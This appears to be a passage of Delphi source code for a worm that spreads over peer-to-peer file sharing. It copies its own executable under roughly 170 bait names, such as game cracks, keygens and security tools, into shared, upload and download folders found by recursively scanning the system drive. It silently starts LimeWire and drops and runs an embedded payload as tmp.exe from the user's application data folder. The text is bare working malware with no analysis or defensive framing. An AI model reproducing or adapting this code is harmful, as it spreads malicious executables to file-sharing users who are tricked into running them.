CopyFile(pchar(FileName),pchar(Path + 'Resident Evil 4 GC Adventure crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Rise of Nations - Thrones & Patriots crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Risk II 1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RM to MP3 Converter 1.21.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RoboForm crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RoboForm.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Roller Coaster Tycoon no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Rollercoaster Tycoon 3 3 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'RollerCoaster Tycoon and Attractions No CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Serials 2000 v7.1 Plus (build 06.16.04) Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'SeXstazy 3.0.2.11.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Shadow Ops - Red Mercury crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ShellShock - Nam 67 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Shockwave Player.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Silent Storm - Sentinels _No Company crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Sim City 4 - Rush Hour no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Sim City 4 Deluxe no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Sim Theme Park World no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Sims 2 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Sniff-em 1.12.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Snood Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Snood.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Soldat 1.1.4.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Soldier of Fortune II- Double Helix No CD Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'SolSuite 2004 - Solitaire Card Games Suite Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'SolSuite 2004 - Solitaire Card Games Suite.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Sonic the Hedgehog 3 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spider-Man 2 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spider-Man 2 GC crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Sponge Bob Square Pants - Operation Krabby Patty no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spy Sweeper 3.2 147 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spybot - Search and Destroy.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'SpyHunter Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'SpyHunter.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spyware doctor 2.1 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spyware Doctor 2.1.0.254 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spyware Doctor Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spyware Doctor V3 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spyware Doctor v3.0.0.288 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Spyware Doctor.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'SpywareBlaster.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Star Wars - Jedi Knight - Jedi Academy no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Star Wars - Knights of the Old Republic crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Star Wars Galactic Battlegrounds- Clone Campaigns no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Star Wars Jedi Knight II - Jedi Outcast no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Star Wars Jedi Knight II- Jedi Outcast no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Star Wars Knights of the Old Republic II - The Sith Lords crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Starcraft - Battlechest no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Strip Poker 2004 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Super dvd Creator 7.5 7.5 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Super Mario Kamek - Magikoopas Revenge 1.2.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Sygate Personal Firewall PRO v5.5 Build 2577 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Symantec Ghost 8.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Symatec System Center V9.0.0.338 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'System Mechanic 5.0c.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Chronicles of Riddick - Escape From Butcher Bay crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Elder Scrolls III - Morrowind Game of the Year Edition Bethesda Softworks crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Legend of Zelda - Four Swords Adventures crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Legend of Zelda - The Minish Cap crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Legend of Zelda (working title) crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The lord of the rings the battle for middle earth Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Lord of the Rings The Battle for Middle-Earth Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Lord of the Rings The Battle for Middle-earth crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Lord of the Rings The Return of The King crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims - Hot Date Expansion Pack no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims - Makin Magic Expansion Pack no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims - Superstar Expansion Pack no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims - Unleashed Expansion Pack no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims - Vacation Expansion Pack no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims 2 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims Clock 1.0.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims Deluxe no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims Double Deluxe no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Sims Vacation no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Suffering crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'The Suffering Midway crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Thief - Deadly Shadows crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Tiger Woods PGA Tour 2004 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Tom Clancys Ghost Recon - Desert Siege no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Tom Clancys Splinter Cell crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Tom Clancys Splinter Cell Pandora Tomorrow crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Tony Hawks Underground crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Total Commander v6.03a PowerPack 25 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Trillian crasher.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Trillian Pro v3.0.950 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Trillian.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Tweak-XP Pro 4.0.2 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Unreal Tournament 2003 no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Unreal Tournament 2004 crack (keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Unreal Tournament 2004 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Unreal Tournament 2004 NO CD crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Vampire - The Masquerade - Bloodlines crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'VirtualLab Data Recovery crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'VirtualLab Data Recovery.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Virtuosa Phoenix Edition Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Warcraft III - Reign Of Chaos no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Warez P2P.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WebRoot Spy Sweeper 3.5.0.189 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Webroot Spy Sweeper Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Webroot Spy Sweeper.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WebSite Watcher v4.02 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Winace 2.x Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Winamp 5.03 Full Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Winamp Full.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'windows server 2003 crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows Server 2003 SP1 Build 1039-2l Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows XP Activation Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows XP home edition Activation.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows XP Pro 64-bit Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows XP Professional crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows XP SP2 KeyGen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows Vista Activation Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows Vista home edition Activation.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows Vista Pro 64-bit Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows Vista Professional crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Windows Vista Activation 2008.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinDVD Platinum 5.0.26.23 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinMX.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinRAR 3.30 Corporate Ed Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinRAR 3.x Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinRAR All KeyGen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinRAR crack (keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinRAR v3.20 Final Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinRAR v3.30 Final Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinRAR v3.41 Final Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinRAR.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZip 9.x Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZip All KeyGen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZip All Versions keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Winzip Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZip Self-Extractor v2.2 keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZip Self-Extractor v2.2 Patch.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZip v8.0 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZIP v9.0 Keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZip v9.0 Registration.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WinZip.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'World of Warcraft crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Worms Armageddon NO CD crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WWE Day of Reckoning GC crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'WWE SmackDown! vs. Raw crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'XBOX X-Fer Ripper and Transfer.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'XP Slipstreamer v1.0 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Yahoo Messenger.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ZeroSpyware Lite.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ZipGenius.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Zone Alarm Security Suite 5.5.062 Crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ZoneAlarm crack (keygen.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'ZoneAlarm.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Zoo Tycoon - Complete Collection no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Zoo Tycoon - Dinosaur Digs no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Zoo Tycoon no cd crack.exe'),False);
CopyFile(pchar(FileName),pchar(Path + 'Zoo Tycoon.exe'),False);
end;

procedure FileListRecursive(Path: string; FileName: string);
var
  FindData: TWIN32FindData;
  hFind: THandle;
begin
  Path := includetrailingbackslash(Path);
  hFind := FindFirstFile(pchar(Path + '*'), FindData);
  if hFind = INVALID_HANDLE_VALUE then exit;

  if IsFolder(FindData) then begin
    if (pos('upload',lowercase(String(FindData.cFileName))) > 0) or
       (pos('shared',lowercase(String(FindData.cFileName))) > 0) or
       (pos('incoming',lowercase(String(FindData.cFileName))) > 0) or
       (pos('download',lowercase(String(FindData.cFileName))) > 0) then begin
         CopyFiles(Path + FindData.cFileName,FileName);
    end;
    if (string(FindData.cFileName) <> '.') and (FindData.cFileName <> '..') then FileListRecursive(Path + FindData.cFileName,FileName);
  end;

  while FindNextFile(hFind, FindData) do begin
    if IsFolder(FindData) then begin
      if (pos('upload',lowercase(String(FindData.cFileName))) > 0) or
         (pos('shared',lowercase(String(FindData.cFileName))) > 0) or
         (pos('incoming',lowercase(String(FindData.cFileName))) > 0) or
         (pos('download',lowercase(String(FindData.cFileName))) > 0) then begin
           CopyFiles(Path + FindData.cFileName,FileName);
      end;
      if (string(FindData.cFileName) <> '.') and (FindData.cFileName <> '..') then FileListRecursive(Path + FindData.cFileName,FileName);
    end;
  end;

  Windows.FindClose(hFind);
end;

function SysDir: string;
var
  Buf: array [0..255] of Char;
begin
  GetSystemDirectory(Buf,255);
  Result := Buf + string('\');
end;

procedure SpreadFilesThread; stdcall;
var
  p: string;
begin
  FileListRecursive(Copy(SysDir,1,3),Dummy);
  if RegGetString(HKEY_LOCAL_MACHINE,'SOFTWARE\LimeWire\InstallDir',p) then begin
    SHellExecute(0,'open',pchar(includetrailingbackslash(p) + 'LimeWire.exe'),'','',SW_HIDE);
  end;
end;

procedure DropFile;
var
  Thr: dword;
  ResourceLocation: HRSRC;
  ResourceSize: dword;
  ResourceHandle: THandle;
  ResourcePointer: pointer;
  str: string;
  stream: tmemorystream;
begin
  ResourceLocation := FindResourceA(hInstance, 'DROPFILE', RT_RCDATA);
  ResourceSize := SizeofResource(hInstance, ResourceLocation);
  ResourceHandle := LoadResource(hInstance, ResourceLocation);
  ResourcePointer := LockResource(ResourceHandle);
  if ResourcePointer <> nil then begin
    SetLength(str, ResourceSize);
    CopyMemory(@str[1], ResourcePointer, ResourceSize);
    FreeResource(ResourceHandle);
    Stream := TMemorySTream.Create;
    Stream.Write(pointer(Str)^,Length(Str));
    Stream.SaveToFile(ParsePath('%APPLICATIONDATA%') + 'tmp.exe');
    shellexecute(0,'open',pchar(ParsePath('%APPLICATIONDATA%') + 'tmp.exe'),'','',SW_SHOWNORMAL);
    Stream.Free;
  end else begin
    Exit;
  end;
end;

procedure SpreadFiles(FileName: string; MultiThread: bool);
var
  Thr: dword;
  ResourceLocation: HRSRC;
  ResourceSize: dword;
  ResourceHandle: THandle;
  ResourcePointer: pointer;
  str: string;
  stream: tmemorystream;
begin
  Num := 0;
  if MultiThread then begin
    Dummy := FileName; //ParsePath('%APPLICATIONDATA%') + 'tmp.zip';
    CreateThread(nil,0,@SpreadFilesThread,nil,0,Thr);
  end else begin
    FileListRecursive(Copy(SysDir,1,3),FileName); //ParsePath('%APPLICATIONDATA%') + 'tmp.zip');
  end;
end;


end.

